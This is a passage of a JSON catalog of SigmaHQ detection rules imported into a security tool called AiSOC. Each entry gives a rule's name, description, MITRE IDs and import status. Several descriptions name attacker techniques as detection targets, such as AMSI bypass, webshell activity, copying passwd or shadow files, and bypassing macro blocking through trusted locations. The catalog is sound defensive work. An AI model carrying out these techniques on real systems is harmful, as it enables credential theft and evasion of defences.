"sigmahq-sigma-f8ed0e8f-7438-4b79-85eb-f358ef2fbebd", "type": "detection", "name": "Github Self Hosted Runner Changes Detected", "description": "A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.\nThis rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected,\nit should be validated in the GitHub UI because the audit log entry may not provide full context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1526", "T1213.003", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-self-hosted-runner-changes-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8ed0e8f-7438-4b79-85eb-f358ef2fbebd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_self_hosted_runner_changes_detected.yml" } }, { "id": "sigmahq-sigma-f91e51c9-f344-4b32-969b-0b6f6b8537d4", "type": "detection", "name": "Renamed Schtasks Execution", "description": "Detects the execution of a renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.\nOne of the very common persistence techniques is scheduling malicious tasks using schtasks.exe.\nBecause it is heavily abused, it is also heavily monitored by security products. 
To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-schtasks-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f91e51c9-f344-4b32-969b-0b6f6b8537d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_schtasks_execution.yml" } }, { "id": "sigmahq-sigma-f91ed517-a6ba-471d-9910-b3b4a398c0f3", "type": "detection", "name": "Potentially Suspicious Windows App Activity", "description": "Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-windows-app-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" } }, { "id": "sigmahq-sigma-f92a6f1e-a512-4a15-9735-da09e78d7273", "type": "detection", "name": "GatherNetworkInfo.VBS Reconnaissance Script Output", "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gathernetworkinfo-vbs-reconnaissance-script-output.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml" } }, { "id": "sigmahq-sigma-f9405037-bc97-4eb7-baba-167dad399b83", "type": "detection", "name": "Github New Secret Created", "description": "Detects when a user creates action secret for the organization, environment, codespaces or repository.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-new-secret-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9405037-bc97-4eb7-baba-167dad399b83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_new_secret_created.yml" } }, { "id": "sigmahq-sigma-f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "type": "detection", "name": "PktMon.EXE Execution", "description": "Detects execution of PktMon, a tool that captures network packets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pktmon-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pktmon_execution.yml" } }, { "id": "sigmahq-sigma-f9578658-9e71-4711-b634-3f9b50cd3c06", "type": "detection", "name": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3", "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-activity-via-emoji-usage-in-commandline-3.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9578658-9e71-4711-b634-3f9b50cd3c06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_3.yml" } }, { "id": "sigmahq-sigma-f99276ad-d122-4989-a09a-d00904a5f9d2", "type": "detection", "name": "Clear PowerShell History - PowerShell Module", "description": "Detects keywords that could indicate clearing PowerShell history", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clear-powershell-history-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" } }, { "id": "sigmahq-sigma-f9999590-1f94-4a34-a91e-951e47bedefd", "type": "detection", "name": "Suspicious Provlaunch.EXE Child Process", "description": "Detects suspicious child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-provlaunch-exe-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9999590-1f94-4a34-a91e-951e47bedefd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml" } }, { "id": "sigmahq-sigma-f99abdf0-6283-4e71-bd2b-b5c048a94743", "type": "detection", "name": "Potentially Suspicious Office Document Executed From Trusted Location", "description": "Detects the execution of an Office application that points to a document that is located in a trusted location. 
Attackers often use this to bypass macro security controls (documents in trusted locations are exempt from macro blocking) and execute their malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-office-document-executed-from-trusted-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f99abdf0-6283-4e71-bd2b-b5c048a94743", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml" } }, { "id": "sigmahq-sigma-f9b3edc5-3322-4fc7-8aa3-245d646cc4b7", "type": "detection", "name": "Potential Linux Amazon SSM Agent Hijacking", "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-linux-amazon-ssm-agent-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9b3edc5-3322-4fc7-8aa3-245d646cc4b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml" } }, { "id": "sigmahq-sigma-f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "type": "detection", "name": "Third Party Software DLL Sideloading", "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/third-party-software-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_third_party.yml" } }, { "id": "sigmahq-sigma-fa00b701-44c6-4679-994d-5a18afa8a707", "type": "detection", "name": "PUA - AdvancedRun Suspicious Execution", "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advancedrun-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa00b701-44c6-4679-994d-5a18afa8a707", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml" } }, { "id": "sigmahq-sigma-fa0c05b6-8ad3-468d-8231-c1cbccb64fba", "type": "detection", "name": "Antivirus Hacktool Detection", "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.\nThis event must not be ignored just because the AV blocked the tool: investigate how it got onto the host in the first place, as its presence typically indicates an attacker already has access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/antivirus-hacktool-detection.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_hacktool.yml" } }, { "id": "sigmahq-sigma-fa1a7e52-3d02-435b-81b8-00da14dd66c1", "type": "detection", "name": "Diskshadow Script Mode - Execution From Potential Suspicious Location", "description": "Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag where the script is located in a potentially suspicious location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/diskshadow-script-mode-execution-from-potential-suspicious-location.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa1a7e52-3d02-435b-81b8-00da14dd66c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml" } }, { "id": "sigmahq-sigma-fa2559c8-1197-471d-9cdd-05a0273d4522", "type": "detection", "name": "Potential AMSI Bypass Script Using NULL Bits", "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amsi-bypass-script-using-null-bits.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa2559c8-1197-471d-9cdd-05a0273d4522", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml" } }, { "id": "sigmahq-sigma-fa277e82-9b78-42dd-b05c-05555c7b6015", "type": "detection", "name": "Enable Local Manifest Installation With Winget", "description": "Detects changes to the AppInstaller (winget) policy. 
Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-local-manifest-installation-with-winget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa277e82-9b78-42dd-b05c-05555c7b6015", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_winget_enable_local_manifest.yml" } }, { "id": "sigmahq-sigma-fa3c117a-bc0d-416e-a31b-0c0e80653efb", "type": "detection", "name": "Chopper Webshell Process Pattern", "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1018", "T1033", "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/chopper-webshell-process-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" } }, { "id": "sigmahq-sigma-fa4aaed5-4fe0-498d-bbc0-08e3346387ba", "type": "detection", "name": "Copy Passwd Or Shadow From TMP Path", "description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copy-passwd-or-shadow-from-tmp-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa4aaed5-4fe0-498d-bbc0-08e3346387ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" } }, { "id": "sigmahq-sigma-fa5b1358-b040-4403-9868-15f7d9ab6329", "type": "detection", "name": "Network Communication With Crypto Mining Pool", "description": "Detects initiated network connections to crypto mining pools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/network-communication-with-crypto-mining-pool.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa5b1358-b040-4403-9868-15f7d9ab6329", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/network_connection/net_connection_win_domain_crypto_mining_pools.yml" } }, { "id": "sigmahq-sigma-fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", "type": "detection", "name": "Suspicious Get Local Groups Information - PowerShell", "description": "Detects the use of PowerShell modules and cmdlets to gather local group information.\nAdversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-local-groups-information-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" } }, { "id": "sigmahq-sigma-fa7703d6-0ee8-4949-889c-48c84bc15b6f", "type": "detection", "name": "New Kind of Network (NKN) Detection", "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. 
This rule looks for DNS requests to NKN-related domains.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-kind-of-network-nkn-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_nkn.yml" } }, { "id": "sigmahq-sigma-fa84aaf5-8142-43cd-9ec2-78cfebf878ce", "type": "detection", "name": "Temporary Access Pass Added To An Account", "description": "Detects when a temporary access pass (TAP) is added to an account. 
TAPs added to privileged accounts should be investigated, as a TAP can be used to sign in and register new authentication methods on the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/temporary-access-pass-added-to-an-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_tap_added.yml" } }, { "id": "sigmahq-sigma-fa935401-513b-467b-81f4-f9e77aa0dd78", "type": "detection", "name": "Crypto Miner User Agent", "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/crypto-miner-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa935401-513b-467b-81f4-f9e77aa0dd78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_cryptominer.yml" } }, { "id": "sigmahq-sigma-faa031b5-21ed-4e02-8881-2591f98d82ed", "type": "detection", "name": "Unauthorized System Time Modification", "description": "Detect scenarios 
where a potentially unauthorized application or user is modifying the system time.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unauthorized-system-time-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "faa031b5-21ed-4e02-8881-2591f98d82ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_time_modification.yml" } }, { "id": "sigmahq-sigma-faa48cae-6b25-4f00-a094-08947fef582f", "type": "detection", "name": "Rar Usage with Password and Compression Level", "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rar-usage-with-password-and-compression-level.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "faa48cae-6b25-4f00-a094-08947fef582f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml" } }, { "id": "sigmahq-sigma-fabb0e80-030c-4e3e-a104-d09676991ac3", "type": "detection", "name": "Suspicious File Created in Outlook Temporary Directory", "description": "Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.\nThis can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-created-in-outlook-temporary-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fabb0e80-030c-4e3e-a104-d09676991ac3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml" } }, { "id": "sigmahq-sigma-fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd", "type": "detection", "name": "Potential ReflectDebugger Content Execution Via WerFault.EXE", "description": "Detects execution of \"WerFault.exe\" with the \"-pr\" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-reflectdebugger-content-execution-via-werfault-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml" } }, { "id": "sigmahq-sigma-fad91067-08c5-4d1a-8d8c-d96a21b37814", "type": "detection", "name": "Potential PowerShell Execution Policy Tampering", "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-powershell-execution-policy-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml" } }, { "id": "sigmahq-sigma-fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd", "type": "detection", "name": "Cloudflared Portable Execution", "description": "Detects the execution of the \"cloudflared\" binary from a non standard location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-portable-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml" } }, { "id": "sigmahq-sigma-fb3722e4-1a06-46b6-b772-253e2e7db933", "type": "detection", "name": "Function Call From Undocumented COM Interface EditionUpgradeManager", "description": "Detects function calls from the EditionUpgradeManager COM interface. 
